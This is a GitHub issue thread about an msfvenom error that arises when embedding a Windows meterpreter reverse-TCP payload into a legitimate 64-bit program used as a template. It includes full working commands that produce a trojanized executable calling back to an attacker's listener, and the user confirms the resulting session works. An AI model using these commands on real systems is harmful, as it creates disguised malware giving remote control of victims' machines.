### ISSUE TITLE
Couldn't find the PE magic!

### ISSUE THREAD

**Issue by Giampli** [rapid7/metasploit-framework#7938]
## Steps to reproduce
I used command:

`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.250 LPORT=4444 -f exe-only -b "/x00" -x ~/i_view64.exe -k -o iview64.exe; file iview64.exe; file i_view64.exe`

Tried with other 64bit software, same result.
It should create an exe with the payload injected, but it show an error: "Error: Couldn't find the PE magic!"

Log of the error: 

```
usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/rex-bin_tools-0.1.1/lib/rex/peparsey/pebase.rb:190:in `initialize'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/rex-bin_tools-0.1.1/lib/rex/peparsey/pebase.rb:214:in `new'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/rex-bin_tools-0.1.1/lib/rex/peparsey/pebase.rb:214:in `_parse_file_header'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/rex-bin_tools-0.1.1/lib/rex/peparsey/pe.rb:36:in `initialize'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/rex-bin_tools-0.1.1/lib/rex/peparsey/pebase.rb:1163:in `new'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/rex-bin_tools-0.1.1/lib/rex/peparsey/pebase.rb:1163:in `new_from_file'
/usr/share/metasploit-framework/lib/msf/util/exe.rb:374:in `to_winpe_only'
/usr/share/metasploit-framework/lib/msf/util/exe.rb:2117:in `to_executable_fmt'
/usr/share/metasploit-framework/lib/msf/core/payload_generator.rb:276:in `format_payload'
/usr/share/metasploit-framework/lib/msf/core/payload_generator.rb:333:in `generate_payload'
/usr/bin/msfvenom:339:in `<main>'
[02/09/2017 18:10:18] [e(0)] core: Rex::PeParsey::FileHeaderError : Couldn't find the PE magic!
```

I'm using kali linux and using Metasploit v4.13.20-dev

**Comment by rwhitcroft** [comment]
msfvenom doesn't like your template EXE. What does `file i_view64.exe` say? You probably don't need to specify `-b` (your slash is backwards btw) - try without that.

This worked for me:
```
rw@rwx:~$ file test64.exe
test64.exe: PE32+ executable (console) x86-64, for MS Windows
rw@rwx:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp -x test64.exe -f exe-only -k -o out.exe LHOST=10.1.1.55 LPORT=443
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe-only file: 773120 bytes
Saved as: out.exe
rw@rwx:~$ file out.exe
out.exe: PE32+ executable (console) x86-64, for MS Windows
```

**Comment by Giampli** [comment]
Ok, now it works, but the program doesn't work fine even if i use -k. But i can start a session on meterpreter

**Comment by egypt** [comment]
Writing back out to the same file (`-o iview64.exe`) may truncate it, which would explain why it didn't look like a PE.
